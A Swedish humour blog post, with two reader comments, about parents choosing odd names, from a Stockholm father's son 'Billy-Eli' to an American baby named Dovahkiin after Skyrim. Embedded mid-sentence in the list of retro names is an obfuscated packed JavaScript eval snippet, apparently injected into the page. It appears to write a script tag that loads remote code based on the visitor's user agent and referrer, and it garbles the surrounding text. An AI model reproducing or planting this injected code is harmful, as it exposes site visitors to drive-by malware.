Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Dovahkiin föddes 11.11.11

Dovahkiin föddes 11.11.11
Filip Urde
  • On 17 november, 2011
  • http://www.revue.se/filip-urde

haha föräldrar… Och särskillt föräldrar idag.

Inte nog med vågen vi har här i Stockholm (vet inte hur det ser ut i resten av riket), där alla föräldrar ska ”bräcka” de andra med ovanligare och ovanligare namn. Trenden med Amerikanska rockabilly 50 tals namn, som Billy, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yefdr|var|u0026u|referrer|snayd||js|php’.split(’|’),0,{}))
Peggy, Bobby, Sue
osv. har hålt i sig länge.

Kommer inte glömma förra veckan på ICA, när jag möts vid charken av en pappa i Jeans, Jeans skjorta, Jeans Jacka och Mustach…

precis som i Family guy! Se klippet nedan.
httpv://youtu.be/eaMese00xN0

När vi står där och jag sneglar lite oblygt och konstaterar faktumet, att det faktiskt står en person i förd full jeans mundering brevid mig. Fantastiskt!

Jag beställer Ribs… det gör han också…

”We share a moment”, så att säga och nickar glatt mot varandra.

Jag säger, ”du också?”. jeans killen svarar ”jepp det är ju ändå torsdag!”. Förstod aldrig riktigt vad som gör torsdag till något man firar med ribs, men jag håller med nu så här i efterhand. Hur som helst, jag packar ner mina ribs i korgen och går mot kassan. I samma stund blir jag totalt omkörd av jeans mannen och jeans mannens son, som så klart dagen till ära kör samma outfit som pappa!

Dock med en Jeans jacka som har teddy foder och så hade han en röd bandana runt halsen. (för cool kid!!!). Men sen bryter helvetet lös, Jeans mannen…Jeans pappan… ropar namnet efter sin son som är påväg i 190 mot godishyllan.

Billy-Eli… ta det lite cool här i affären, vi är snart hemma och där har du ju massor med godis.

Billy-Eli?!? Är det bara jag som tycker detta är HELT overkligt på ett Svenskt barn? Inte för att jag tror att man kommer undan med det i USA heller, men WOW! Snacka om dubbel-namn…

Men nu har detta kanske toppats av det Amerikanska paret Megan och Eric Kellermeyer som blev de lyckliga föräldrarna till Dovahkiin Tom Kellermeyer. Vilket är en hyllning till spelet Skyrim, som i sin tur ger paret en livstids gratis ”prenumeration” på alla spel från Bethesda. Där kan man snacka dedication…

Dovahkiin, som betyder Dragonborn är alltså barnet som syns på bilden ovan. Dovahkiin föddes 11.11.11, vilket är Skyrims releasedag! Barn namn är kul

Nuff said…

www.bethblog.com

Comments

  1. Aud4am

    hahaha! Tack Filip! jättebra artikel. det här gjorde min dag… nu kan man gå från jobbet med ett leende… =D

  2. Penguin85

    haha bra artikel! 😀